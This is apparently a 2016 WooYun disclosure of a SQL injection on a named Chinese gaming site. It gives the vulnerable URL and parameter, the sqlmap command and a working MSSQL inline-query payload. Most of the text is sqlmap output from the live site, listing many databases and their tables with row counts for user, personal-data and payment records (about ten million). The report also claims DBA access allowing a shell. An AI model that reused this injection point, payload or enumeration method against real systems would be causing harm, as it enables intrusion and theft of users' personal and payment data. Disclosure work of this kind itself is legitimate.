
Vulnerability summary (24 followers)

Defect ID: wooyun-2016-0171452

Title: SQL injection with DBA privileges on the 走去玩游戏网 main site (around ten million user records affected)

Vendor: 走去玩游戏网

Author: 路人甲

Submitted: 2016-01-21 12:00

Fix time: 2016-03-05 09:52

Disclosure time: 2016-03-05 09:52

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: vendor could not be contacted, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:

Bookmarked by 4 users


Vulnerability details

Disclosure status:

2016-01-21: actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed
2016-03-05: the vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

SQL injection with DBA privileges on the 走去玩游戏网 main site (around ten million user records affected)

Detailed description:

[Injection point]: python sqlmap.py -u "http://www.zouquwan.com/common/Server_Default.aspx?ColId=2"
sqlmap screenshots:
[Current database]

1.png


[Cross-database query]

2.png


The counts below cover only the tables that hold large amounts of user information; the real total is higher.
[Database 1]
Summed, about a million user records
| dbo.KyUsers | 541078 |
| dbo.Ky_User_Personal | 540668 |

3.png


[Database 2]
User information and payment information, over a million records
| dbo.Ky_User_Personal | 1077610 |
| dbo.KyPlayedGame | 658654 |
| dbo.KyUserCard | 306459 |
| dbo.KyPayLog | 98208 |
| dbo.KyUsers | 32446 |

4.png


[Database 3]
User information summed, over a million records
| dbo.KyUsers | 494228 |
| dbo.Ky_User_Personal | 493826 |

5.png


[Database 4]
User information and payment information, over a million records
| dbo.Ky_User_Personal | 1067853 |

6.png


[Database 5]
Summed, over four million user records
| dbo.Ky_User_Personal | 2349603 |
| dbo.KyUsers | 2349146 |

7.png


[Databases 6 and 7]
Cross-database query of the forums
| dbo.dnt_users | 614321 |
| dbo.dnt_userfields | 614318 |

8.png


9.png


In total, around ten million user records (this is a maths problem)


[DBA privileges (getshell possible)]

10.png


Proof of vulnerability:

Database information:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: ColId (GET)
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: ColId=(SELECT CHAR(113)+CHAR(107)+CHAR(107)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (5902=5902) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(106)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
Database: owanwan_oss
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.KyUserProcessLog | 1680 |
| dbo.KyDayStateForExcel | 1569 |
| dbo.KyController | 244 |
| dbo.KyLabelContent | 165 |
| dbo.KyTag | 115 |
| dbo.KyColumn | 107 |
| dbo.KyLongCards | 100 |
| dbo.KyLog | 90 |
| dbo.KyDictionary | 82 |
| dbo.KyPowerColumn | 64 |
| dbo.KyStyle | 48 |
| dbo.KyLinkManager | 45 |
| dbo.KyModelField | 42 |
| dbo.KyUsers | 36 |
| dbo.KyUserGroupModelField | 34 |
| dbo.Ky_User_Personal | 30 |
| dbo.KyChannel | 29 |
| dbo.KyPlayedGame | 29 |
| dbo.KyChannelTemplate | 24 |
| dbo.KyPayLog | 21 |
| dbo.Ky_U_Game | 14 |
| dbo.KySuperLabel | 14 |
| dbo.KyActionPassword | 13 |
| dbo.KyPowerGroup | 11 |
| dbo.KyLbCategory | 9 |
| dbo.KyListStyleContent | 8 |
| dbo.Ky_U_Shop | 6 |
| dbo.KyArticle | 6 |
| dbo.KyModel | 6 |
| dbo.KyUserTask | 6 |
| dbo.KyStyleCategory | 5 |
| dbo.KyKeyUrl | 4 |
| dbo.KyOrder | 4 |
| dbo.KyUserFriendGroup | 4 |
| dbo.KyAdmin | 2 |
| dbo.KyReport | 2 |
| dbo.KyTestPlayLink | 2 |
| dbo.KyUserGroup | 2 |
| dbo.KyUserGroupModel | 2 |
| dbo.KyWebMessage | 2 |
| dbo.Ky_U_Server | 1 |
| dbo.KyAd | 1 |
| dbo.KyAdCategory | 1 |
| dbo.KyLink | 1 |
| dbo.KySinglePage | 1 |
| dbo.KySpecial | 1 |
| dbo.KySuperior | 1 |
| dbo.KyUserSpace | 1 |
| dbo.KyVoteCategory | 1 |
+--------------------------------------+---------+
Database: stat
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.Stat_ViewOnClick | 2344112 |
| dbo.Stat_Ip | 369089 |
| dbo.Stat_ViewEngine | 3417 |
| dbo.Stat_ViewHour | 1610 |
| dbo.Stat_FriendLink | 47 |
| dbo.Stat_ViewDay | 41 |
| dbo.Stat_News | 16 |
| dbo.Stat_Users | 14 |
| dbo.Stat_Message | 11 |
| dbo.Stat_Navigate | 9 |
| dbo.Stat_ViewWeekDay | 9 |
| dbo.Stat_Notify | 6 |
| dbo.Stat_AD | 5 |
| dbo.Stat_WebSites | 4 |
| dbo.Stat_System | 3 |
| dbo.Stat_ViewMonth | 3 |
| dbo.Stat_Company | 1 |
| dbo.Stat_stmp | 1 |
+--------------------------------------+---------+
Database: NewOSS
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.KyUsers | 541078 |
| dbo.Ky_User_Personal | 540668 |
| dbo.KyPlayedGame | 489296 |
| dbo.KySxdCards | 7195 |
| dbo.KyLog | 3568 |
| dbo.KyLongCards | 3233 |
| dbo.KyUserProcessLog | 1680 |
| dbo.KyDayStateForExcel | 1569 |
| dbo.KyArticle | 629 |
| dbo.Ky_User_Business | 411 |
| dbo.KyController | 238 |
| dbo.Ky_U_Server | 214 |
| dbo.KyUser_Attribute | 181 |
| dbo.KyLabelContent | 158 |
| dbo.KyTag | 115 |
| dbo.KyColumn | 107 |
| dbo.KyDictionary | 82 |
| dbo.KyPowerColumn | 64 |
| dbo.KyStyle | 47 |
| dbo.KyLinkManager | 45 |
| dbo.KyModelField | 41 |
| dbo.TemplateUser | 38 |
| dbo.KyUserGroupModelField | 34 |
| dbo.KyChannel | 29 |
| dbo.Ky_U_Game | 24 |
| dbo.KyChannelTemplate | 24 |
| dbo.KyAdmin | 18 |
| dbo.KyActionPassword | 13 |
| dbo.KyPowerGroup | 11 |
| dbo.KySuperLabel | 11 |
| dbo.KyLbCategory | 8 |
| dbo.KyListStyleContent | 8 |
| dbo.KyTransHistory | 7 |
| dbo.KyUserTask | 7 |
| dbo.Ky_U_Shop | 6 |
| dbo.KyModel | 6 |
| dbo.Ky_U_Task | 4 |
| dbo.KyKeyUrl | 4 |
| dbo.KyOrder | 4 |
| dbo.KyStyleCategory | 4 |
| dbo.KyUserFriendGroup | 4 |
| dbo.KyAnomaly | 3 |
| dbo.KyPayLog | 2 |
| dbo.KyReport | 2 |
| dbo.KyUserGroup | 2 |
| dbo.KyUserGroupModel | 2 |
| dbo.KyWebMessage | 2 |
| dbo.KyAd | 1 |
| dbo.KyAdCategory | 1 |
| dbo.KyLink | 1 |
| dbo.KySinglePage | 1 |
| dbo.KySpecial | 1 |
| dbo.KySuperior | 1 |
| dbo.KyTestPlayLink | 1 |
| dbo.KyUserSpace | 1 |
| dbo.KyVoteCategory | 1 |
+--------------------------------------+---------+
Database: bbsgamexilu
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.dnt_medals | 99 |
| dbo.dnt_smilies | 88 |
| dbo.dnt_help | 29 |
| dbo.dnt_topicidentify | 17 |
| dbo.dnt_onlinelist | 16 |
| dbo.dnt_usergroups | 15 |
| dbo.dnt_attachtypes | 6 |
| dbo.dnt_scheduledevents | 6 |
| dbo.dnt_navs | 5 |
| dbo.dnt_admingroups | 3 |
| dbo.dnt_bbcodes | 2 |
| dbo.dnt_forumfields | 2 |
| dbo.dnt_forums | 2 |
| dbo.dnt_forumlinks | 1 |
| dbo.dnt_notices | 1 |
| dbo.dnt_online | 1 |
| dbo.dnt_onlinetime | 1 |
| dbo.dnt_statistics | 1 |
| dbo.dnt_statvars | 1 |
| dbo.dnt_tablelist | 1 |
| dbo.dnt_templates | 1 |
| dbo.dnt_userfields | 1 |
| dbo.dnt_users | 1 |
+--------------------------------------+---------+
Database: OSS
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.Ky_User_Personal | 1077610 |
| dbo.KyPlayedGame | 658654 |
| dbo.KyUserCard | 306459 |
| dbo.KyPayLog | 98208 |
| dbo.KyUsers | 32446 |
| dbo.Ky_UsersUpdate | 31271 |
| dbo.KyLog | 13149 |
| dbo.Ky_BindUserName | 12422 |
| dbo.KySxdCards | 12349 |
| dbo.Ky_BindUserName_20130606 | 11813 |
| dbo.KyArticle | 8856 |
| dbo.Ky_BindUserName2 | 8078 |
| dbo.KyLongCards | 4699 |
| dbo.KyUserProcessLog | 3553 |
| dbo.KyDayStateForExcel | 3121 |
| dbo.temp_users | 2581 |
| dbo.Ky_U_Server | 1179 |
| dbo.KyUser_Attribute | 667 |
| dbo.KyTestPlayLink | 634 |
| dbo.KyLink | 421 |
| dbo.Ky_User_Business | 411 |
| dbo.KyTag | 396 |
| dbo.KyLabelContent | 273 |
| dbo.KyController | 246 |
| dbo.KyColumn | 227 |
| dbo.KyTransHistory | 206 |
| dbo.KyKeyUrl | 116 |
| dbo.TemplateUser | 115 |
| dbo.KyDictionary | 83 |
| dbo.KyPowerColumn | 63 |
| dbo.KyChannel | 62 |
| dbo.Ky_U_Game | 61 |
| dbo.KyLinkManager | 45 |
| dbo.KyChannelTemplate | 39 |
| dbo.KyStyle | 34 |
| dbo.KyUserGroupModelField | 33 |
| dbo.KyModelField | 16 |
| dbo.KyPowerGroup | 11 |
| dbo.KyAdmin | 9 |
| dbo.KyActionPassword | 8 |
| dbo.KyLbCategory | 8 |
| dbo.KyListStyleContent | 8 |
| dbo.KyAnomaly | 5 |
| dbo.KyModel | 4 |
| dbo.KyStyleCategory | 4 |
| dbo.KyUserFriendGroup | 4 |
| dbo.KySuperLabel | 3 |
| dbo.KyUserGroup | 2 |
| dbo.KyUserGroupModel | 2 |
| dbo.KyAd | 1 |
| dbo.KyAdCategory | 1 |
| dbo.KyNotice | 1 |
| dbo.KySinglePage | 1 |
| dbo.KySpecial | 1 |
| dbo.KySuperior | 1 |
| dbo.KyTagCategory | 1 |
| dbo.KyVoteCategory | 1 |
+--------------------------------------+---------+
Database: oss20120620_test
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.KyUsers | 494228 |
| dbo.Ky_User_Personal | 493826 |
| dbo.KyPlayedGame | 437623 |
| dbo.KyUserCard | 119866 |
| dbo.KyPayLog | 35192 |
| dbo.KySxdCards | 5618 |
| dbo.KyLog | 2806 |
| dbo.KyLongCards | 2519 |
| dbo.KyDayStateForExcel | 850 |
| dbo.KyUserProcessLog | 720 |
| dbo.Ky_User_Business | 411 |
| dbo.KyArticle | 213 |
| dbo.KyController | 175 |
| dbo.Ky_U_Server | 166 |
| dbo.KyUser_Attribute | 136 |
| dbo.KyTag | 95 |
| dbo.KyDictionary | 83 |
| dbo.KyLabelContent | 65 |
| dbo.KyPowerColumn | 61 |
| dbo.KyLinkManager | 45 |
| dbo.Ky_U_Game | 38 |
| dbo.KyUserGroupModelField | 33 |
| dbo.KyStyle | 23 |
| dbo.KyChannelTemplate | 16 |
| dbo.KyModelField | 16 |
| dbo.TemplateUser | 12 |
| dbo.KyColumn | 11 |
| dbo.KyAdmin | 10 |
| dbo.KyChannel | 8 |
| dbo.KyLbCategory | 8 |
| dbo.KyListStyleContent | 8 |
| dbo.KyActionPassword | 7 |
| dbo.KyKeyUrl | 4 |
| dbo.KyModel | 4 |
| dbo.KyPowerGroup | 4 |
| dbo.KyStyleCategory | 4 |
| dbo.KyUserFriendGroup | 4 |
| dbo.KyAnomaly | 3 |
| dbo.KyTransHistory | 3 |
| dbo.KySuperLabel | 2 |
| dbo.KyUserGroup | 2 |
| dbo.KyUserGroupModel | 2 |
| dbo.KyKeyWord | 1 |
| dbo.KyLink | 1 |
| dbo.KySinglePage | 1 |
| dbo.KySuperior | 1 |
| dbo.KyTestPlayLink | 1 |
| dbo.KyVoteCategory | 1 |
+--------------------------------------+---------+
Database: zouquwan
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.KyUserCard | 9511 |
| dbo.KyPlayedGame | 9021 |
| dbo.Ky_User_Personal | 5317 |
| dbo.KyPayLog | 3848 |
| dbo.KyUsers | 2978 |
| dbo.KyLog | 2641 |
| dbo.Ky_U_Server | 847 |
| dbo.KyArticle | 826 |
| dbo.KyController | 238 |
| dbo.KyLabelContent | 219 |
| dbo.KyColumn | 151 |
| dbo.KyLongCards | 100 |
| dbo.JCZ3Tmp | 94 |
| dbo.KyDictionary | 82 |
| dbo.KyPowerColumn | 64 |
| dbo.KyStyle | 49 |
| dbo.KyLinkManager | 45 |
| dbo.KyModelField | 42 |
| dbo.TemplateUser | 40 |
| dbo.Ky_U_Game | 34 |
| dbo.KyUserGroupModelField | 34 |
| dbo.KySuperLabel | 14 |
| dbo.KyActionPassword | 13 |
| dbo.KyPowerGroup | 11 |
| dbo.KyLbCategory | 9 |
| dbo.KyListStyleContent | 8 |
| dbo.KyTransHistory | 7 |
| dbo.Ky_U_Shop | 6 |
| dbo.KyModel | 6 |
| dbo.KyUserTask | 6 |
| dbo.KyChannel | 5 |
| dbo.KyKeyUrl | 5 |
| dbo.KyStyleCategory | 5 |
| dbo.Ky_U_Task | 4 |
| dbo.KyOrder | 4 |
| dbo.KyReport | 4 |
| dbo.KyUserFriendGroup | 4 |
| dbo.KyTestPlayLink | 3 |
| dbo.KyUserGroup | 2 |
| dbo.KyUserGroupModel | 2 |
| dbo.KyWebMessage | 2 |
| dbo.KyAd | 1 |
| dbo.KyAdCategory | 1 |
| dbo.KyAdmin | 1 |
| dbo.KyAnomaly | 1 |
| dbo.KyLink | 1 |
| dbo.KySinglePage | 1 |
| dbo.KySpecial | 1 |
| dbo.KySuperior | 1 |
| dbo.KySxdCards | 1 |
| dbo.KyUserSpace | 1 |
| dbo.KyVoteCategory | 1 |
+--------------------------------------+---------+
Database: test20140106
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.Ky_User_Personal | 1067853 |
| dbo.KyPlayedGame | 657788 |
| dbo.KyUserCard | 306459 |
| dbo.KyPayLog | 97926 |
| dbo.Ky_UsersUpdate | 31271 |
| dbo.KyLog | 13096 |
| dbo.Ky_BindUserName | 12419 |
| dbo.KySxdCards | 12330 |
| dbo.Ky_BindUserName_20130606 | 11813 |
| dbo.KyArticle | 8854 |
| dbo.Ky_BindUserName2 | 8078 |
| dbo.KyUsers | 5926 |
| dbo.KyLongCards | 4699 |
| dbo.KyUserProcessLog | 3553 |
| dbo.KyDayStateForExcel | 3121 |
| dbo.temp_users | 2581 |
| dbo.Ky_U_Server | 1158 |
| dbo.KyUser_Attribute | 667 |
| dbo.KyTestPlayLink | 634 |
| dbo.TestUserName | 441 |
| dbo.KyLink | 421 |
| dbo.Ky_User_Business | 411 |
| dbo.KyTag | 396 |
| dbo.KyLabelContent | 273 |
| dbo.KyController | 246 |
| dbo.KyColumn | 227 |
| dbo.KyTransHistory | 206 |
| dbo.KyKeyUrl | 116 |
| dbo.TemplateUser | 115 |
| dbo.KyDictionary | 83 |
| dbo.KyPowerColumn | 63 |
| dbo.KyChannel | 62 |
| dbo.Ky_U_Game | 61 |
| dbo.KyLinkManager | 45 |
| dbo.KyChannelTemplate | 39 |
| dbo.KyStyle | 34 |
| dbo.KyUserGroupModelField | 33 |
| dbo.KyModelField | 16 |
| dbo.KyPowerGroup | 11 |
| dbo.KyAdmin | 9 |
| dbo.KyActionPassword | 8 |
| dbo.KyLbCategory | 8 |
| dbo.KyListStyleContent | 8 |
| dbo.KyAnomaly | 5 |
| dbo.KyModel | 4 |
| dbo.KyStyleCategory | 4 |
| dbo.KyUserFriendGroup | 4 |
| dbo.KySuperLabel | 3 |
| dbo.KyUserGroup | 2 |
| dbo.KyUserGroupModel | 2 |
| dbo.KyAd | 1 |
| dbo.KyAdCategory | 1 |
| dbo.KyNotice | 1 |
| dbo.KySinglePage | 1 |
| dbo.KySpecial | 1 |
| dbo.KySuperior | 1 |
| dbo.KyTagCategory | 1 |
| dbo.KyVoteCategory | 1 |
+--------------------------------------+---------+
Database: OSSbak
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.Ky_User_Personal | 2349603 |
| dbo.KyUsers | 2349146 |
| dbo.KyPlayedGame | 683280 |
| dbo.KyUserCard | 312828 |
| dbo.KyPayLog | 114418 |
| dbo.Ky_UsersUpdate | 31271 |
| dbo.KyLog | 15882 |
| dbo.KySxdCards | 12764 |
| dbo.Ky_BindUserName | 12534 |
| dbo.Ky_BindUserName_20130606 | 11813 |
| dbo.KyArticle | 9408 |
| dbo.Ky_BindUserName2 | 8078 |
| dbo.KyLongCards | 4701 |
| dbo.kyUsersCardId | 3880 |
| dbo.KyUserProcessLog | 3553 |
| dbo.KyDayStateForExcel | 3121 |
| dbo.temp_users | 2581 |
| dbo.Ky_U_Server | 1888 |
| dbo.KyTestPlayLink | 713 |
| dbo.KyUser_Attribute | 667 |
| dbo.KyUserstest | 458 |
| dbo.KyLink | 425 |
| dbo.Ky_User_Business | 411 |
| dbo.KyTag | 403 |
| dbo.KyLabelContent | 343 |
| dbo.KyColumn | 298 |
| dbo.KyController | 246 |
| dbo.KyTransHistory | 206 |
| dbo.KyKeyUrl | 116 |
| dbo.TemplateUser | 115 |
| dbo.KyDictionary | 83 |
| dbo.KyChannel | 80 |
| dbo.Ky_U_Game | 78 |
| dbo.KyPowerColumn | 63 |
| dbo.KyLinkManager | 45 |
| dbo.KyChannelTemplate | 39 |
| dbo.KyStyle | 34 |
| dbo.KyUserGroupModelField | 33 |
| dbo.KyPayLogbak | 27 |
| dbo.KyModelField | 16 |
| dbo.KyPowerGroup | 11 |
| dbo.KyAdmin | 10 |
| dbo.KyActionPassword | 8 |
| dbo.KyLbCategory | 8 |
| dbo.KyListStyleContent | 8 |
| dbo.KyAnomaly | 5 |
| dbo.KyModel | 4 |
| dbo.KyStyleCategory | 4 |
| dbo.KyUserFriendGroup | 4 |
| dbo.KySuperLabel | 3 |
| dbo.KyUserGroup | 2 |
| dbo.KyUserGroupModel | 2 |
| dbo.KyAd | 1 |
| dbo.KyAdCategory | 1 |
| dbo.KyNotice | 1 |
| dbo.KySinglePage | 1 |
| dbo.KySpecial | 1 |
| dbo.KySuperior | 1 |
| dbo.KyTagCategory | 1 |
| dbo.KyUserAlbum | 1 |
| dbo.KyUserSpace | 1 |
| dbo.KyVoteCategory | 1 |
+--------------------------------------+---------+
Database: Moyou
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.Ky_User_Business | 411 |
| dbo.KyTag | 400 |
| dbo.Ky_User_Personal | 385 |
| dbo.KyUsers | 385 |
| dbo.KyController | 247 |
| dbo.KyLink | 170 |
| dbo.KyArticle | 153 |
| dbo.KyLog | 147 |
| dbo.KyKeyUrl | 116 |
| dbo.TemplateUser | 110 |
| dbo.KyLabelContent | 100 |
| dbo.KyDictionary | 85 |
| dbo.KyPowerColumn | 63 |
| dbo.KyLinkManager | 45 |
| dbo.KyChannelTemplate | 39 |
| dbo.KyStyle | 35 |
| dbo.KyUserGroupModelField | 33 |
| dbo.KyColumn | 24 |
| dbo.KyModelField | 22 |
| dbo.KyAdmin | 19 |
| dbo.KyPowerGroup | 11 |
| dbo.KyChannel | 9 |
| dbo.KyActionPassword | 8 |
| dbo.KyLbCategory | 8 |
| dbo.KyListStyleContent | 8 |
| dbo.KyModel | 5 |
| dbo.KyAnomaly | 4 |
| dbo.KyStyleCategory | 4 |
| dbo.KyUserFriendGroup | 4 |
| dbo.KySuperLabel | 3 |
| dbo.Ky_U_Flash | 2 |
| dbo.Ky_U_Game | 2 |
| dbo.KyUserGroup | 2 |
| dbo.KyUserGroupModel | 2 |
| dbo.Ky_U_Server | 1 |
| dbo.KyAd | 1 |
| dbo.KyAdCategory | 1 |
| dbo.KyNotice | 1 |
| dbo.KySinglePage | 1 |
| dbo.KySpecial | 1 |
| dbo.KySuperior | 1 |
| dbo.KyTagCategory | 1 |
| dbo.KyVoteCategory | 1 |
+--------------------------------------+---------+
Database: msdb
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.MSdbms_datatype_mapping | 325 |
| dbo.sysdatatypemappings | 325 |
| dbo.MSdbms_map | 248 |
| dbo.MSdatatype_mappings | 174 |
| dbo.MSdbms_datatype | 141 |
| dbo.backupfile | 129 |
| dbo.backupfilegroup | 63 |
| dbo.backupset | 63 |
| dbo.backupmediafamily | 56 |
| dbo.backupmediaset | 55 |
| dbo.syssessions | 51 |
| dbo.restorefile | 36 |
| dbo.syscategories | 21 |
| dbo.restorefilegroup | 18 |
| dbo.restorehistory | 18 |
| dbo.syssubsystems | 11 |
| dbo.MSdbms | 7 |
| dbo.sysmail_configuration | 7 |
| dbo.sysdtscategories | 3 |
| dbo.sysdtspackagefolders90 | 2 |
| dbo.sysdbmaintplans | 1 |
| dbo.sysmail_servertype | 1 |
| dbo.sysoriginatingservers_view | 1 |
| dbo.systargetservers_view | 1 |
+--------------------------------------+---------+
Database: owanwan
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.KyUserCard | 5218 |
| dbo.KyLog | 4650 |
| dbo.KyPlayedGame | 4045 |
| dbo.Ky_User_Personal | 3074 |
| dbo.KyUserProcessLog | 1777 |
| dbo.KyPayLog | 1607 |
| dbo.KyDayStateForExcel | 1569 |
| dbo.Ky_U_Server | 939 |
| dbo.KyUsers | 776 |
| dbo.KyArticle | 757 |
| dbo.KyController | 240 |
| dbo.KyUser_Attribute | 221 |
| dbo.KyLabelContent | 184 |
| dbo.KyColumn | 128 |
| dbo.KyTag | 116 |
| dbo.KyLongCards | 100 |
| dbo.KySxdCards | 100 |
| dbo.KyDictionary | 82 |
| dbo.KyPowerColumn | 64 |
| dbo.KyStyle | 49 |
| dbo.KyLinkManager | 45 |
| dbo.Ky_U_Game | 44 |
| dbo.KyModelField | 42 |
| dbo.TemplateUser | 38 |
| dbo.KyChannel | 34 |
| dbo.KyUserGroupModelField | 34 |
| dbo.KyChannelTemplate | 24 |
| dbo.KySuperLabel | 14 |
| dbo.KyActionPassword | 13 |
| dbo.KyPowerGroup | 11 |
| dbo.KyTransHistory | 10 |
| dbo.KyLbCategory | 9 |
| dbo.KyListStyleContent | 8 |
| dbo.Ky_U_Shop | 6 |
| dbo.KyModel | 6 |
| dbo.KyUserTask | 6 |
| dbo.KyKeyUrl | 5 |
| dbo.KyStyleCategory | 5 |
| dbo.Ky_U_Task | 4 |
| dbo.KyUserFriendGroup | 4 |
| dbo.KyReport | 3 |
| dbo.KyTestPlayLink | 3 |
| dbo.KyAdmin | 2 |
| dbo.KyUserGroup | 2 |
| dbo.KyUserGroupModel | 2 |
| dbo.KyWebMessage | 2 |
| dbo.KyAd | 1 |
| dbo.KyAdCategory | 1 |
| dbo.KyAnomaly | 1 |
| dbo.KyLink | 1 |
| dbo.KySinglePage | 1 |
| dbo.KySpecial | 1 |
| dbo.KySuperior | 1 |
| dbo.KyUserSpace | 1 |
| dbo.KyVoteCategory | 1 |
+--------------------------------------+---------+
Database: master
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| sys.all_parameters | 6697 |
| sys.all_columns | 4254 |
| dbo.spt_values | 2346 |
| sys.all_objects | 1808 |
| sys.all_sql_modules | 1591 |
| sys.all_views | 284 |
| sys.allocation_units | 112 |
| INFORMATION_SCHEMA.COLUMNS | 50 |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES | 44 |
| INFORMATION_SCHEMA.SCHEMATA | 14 |
| INFORMATION_SCHEMA.TABLES | 6 |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES | 5 |
| dbo.MSreplication_options | 3 |
| INFORMATION_SCHEMA.ROUTINES | 2 |
| dbo.spt_monitor | 1 |
+--------------------------------------+---------+
Database: zouquwantest
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.KyUserCard | 9511 |
| dbo.Ky_User_Personal | 2970 |
| dbo.KyPlayedGame | 2517 |
| dbo.KyUsers | 1305 |
| dbo.KyPayLog | 837 |
| dbo.KyLog | 715 |
| dbo.KyController | 238 |
| dbo.KyLabelContent | 219 |
| dbo.KyArticle | 151 |
| dbo.KyColumn | 151 |
| dbo.Ky_U_Server | 124 |
| dbo.KyLongCards | 100 |
| dbo.KyDictionary | 82 |
| dbo.KyPowerColumn | 64 |
| dbo.KyStyle | 49 |
| dbo.KyLinkManager | 45 |
| dbo.KyModelField | 42 |
| dbo.TemplateUser | 40 |
| dbo.KyUserGroupModelField | 34 |
| dbo.Ky_U_Game | 17 |
| dbo.KySuperLabel | 14 |
| dbo.KyActionPassword | 13 |
| dbo.KyPowerGroup | 11 |
| dbo.KyLbCategory | 9 |
| dbo.KyListStyleContent | 8 |
| dbo.KyTransHistory | 7 |
| dbo.Ky_U_Shop | 6 |
| dbo.KyModel | 6 |
| dbo.KyUserTask | 6 |
| dbo.KyChannel | 5 |
| dbo.KyKeyUrl | 5 |
| dbo.KyStyleCategory | 5 |
| dbo.Ky_U_Task | 4 |
| dbo.KyOrder | 4 |
| dbo.KyUserFriendGroup | 4 |
| dbo.KyReport | 3 |
| dbo.KyTestPlayLink | 3 |
| dbo.KyUserGroup | 2 |
| dbo.KyUserGroupModel | 2 |
| dbo.KyWebMessage | 2 |
| dbo.KyAd | 1 |
| dbo.KyAdCategory | 1 |
| dbo.KyAdmin | 1 |
| dbo.KyLink | 1 |
| dbo.KySinglePage | 1 |
| dbo.KySpecial | 1 |
| dbo.KySuperior | 1 |
| dbo.KySxdCards | 1 |
| dbo.KyUserSpace | 1 |
| dbo.KyVoteCategory | 1 |
+--------------------------------------+---------+
Database: BBS
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.dnt_users | 614321 |
| dbo.dnt_userfields | 614318 |
| dbo.dnt_pms | 158452 |
| dbo.dnt_myposts | 43548 |
| dbo.dnt_posts1 | 31793 |
| dbo.dnt_moderatormanagelog | 30221 |
| dbo.dnt_mytopics | 24664 |
| dbo.dnt_topics | 24657 |
| dbo.dnt_onlinetime | 9377 |
| dbo.dnt_topictagcaches | 8932 |
| dbo.dnt_myattachments | 3659 |
| dbo.dnt_attachments | 3536 |
| dbo.dnt_adminvisitlog | 3430 |
| dbo.dnt_topictags | 2084 |
| dbo.dnt_trendstat | 1591 |
| dbo.dnt_scheduledevents | 1532 |
| dbo.dnt_statvars | 1274 |
| dbo.dnt_tags | 1242 |
| dbo.dnt_forumfields | 295 |
| dbo.dnt_forums | 295 |
| dbo.dnt_stats | 104 |
| dbo.dnt_medals | 99 |
| dbo.dnt_smilies | 88 |
| dbo.dnt_topictypes | 37 |
| dbo.dnt_forumlinks | 31 |
| dbo.dnt_help | 29 |
| dbo.dnt_onlinelist | 20 |
| dbo.dnt_moderators | 19 |
| dbo.dnt_usergroups | 19 |
| dbo.dnt_topicidentify | 18 |
| dbo.dnt_polloptions | 16 |
| dbo.dnt_favorites | 14 |
| dbo.dnt_online | 13 |
| dbo.dnt_invitation | 10 |
| dbo.dnt_attachtypes | 6 |
| dbo.dnt_navs | 6 |
| dbo.dnt_bbcodes | 5 |
| dbo.dnt_admingroups | 3 |
| dbo.dnt_polls | 2 |
| dbo.dnt_templates | 2 |
| dbo.dnt_announcements | 1 |
| dbo.dnt_creditslog | 1 |
| dbo.dnt_notices | 1 |
| dbo.dnt_postid | 1 |
| dbo.dnt_ratelog | 1 |
| dbo.dnt_searchcaches | 1 |
| dbo.dnt_statistics | 1 |
| dbo.dnt_tablelist | 1 |
| dbo.sysdiagrams | 1 |
+--------------------------------------+---------+
Database: bbs_moyou
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.dnt_myposts | 55915 |
| dbo.dnt_moderatormanagelog | 54780 |
| dbo.dnt_userfields | 14936 |
| dbo.dnt_users | 14936 |
| dbo.dnt_pms | 14935 |
| dbo.dnt_onlinetime | 12971 |
| dbo.dnt_posts1 | 1402 |
| dbo.dnt_mytopics | 1306 |
| dbo.dnt_topics | 1003 |
| dbo.dnt_scheduledevents | 891 |
| dbo.dnt_statvars | 356 |
| dbo.dnt_trendstat | 344 |
| dbo.dnt_medals | 99 |
| dbo.dnt_smilies | 88 |
| dbo.dnt_adminvisitlog | 42 |
| dbo.dnt_help | 29 |
| dbo.dnt_topicidentify | 17 |
| dbo.dnt_onlinelist | 16 |
| dbo.dnt_usergroups | 15 |
| dbo.dnt_tags | 13 |
| dbo.dnt_forumfields | 8 |
| dbo.dnt_forums | 8 |
| dbo.dnt_online | 8 |
| dbo.dnt_attachtypes | 6 |
| dbo.dnt_navs | 5 |
| dbo.dnt_admingroups | 3 |
| dbo.dnt_bbcodes | 2 |
| dbo.dnt_topictypes | 2 |
| dbo.dnt_failedlogins | 1 |
| dbo.dnt_forumlinks | 1 |
| dbo.dnt_postid | 1 |
| dbo.dnt_searchcaches | 1 |
| dbo.dnt_statistics | 1 |
| dbo.dnt_tablelist | 1 |
| dbo.dnt_templates | 1 |
+--------------------------------------+---------+

Fix plan:
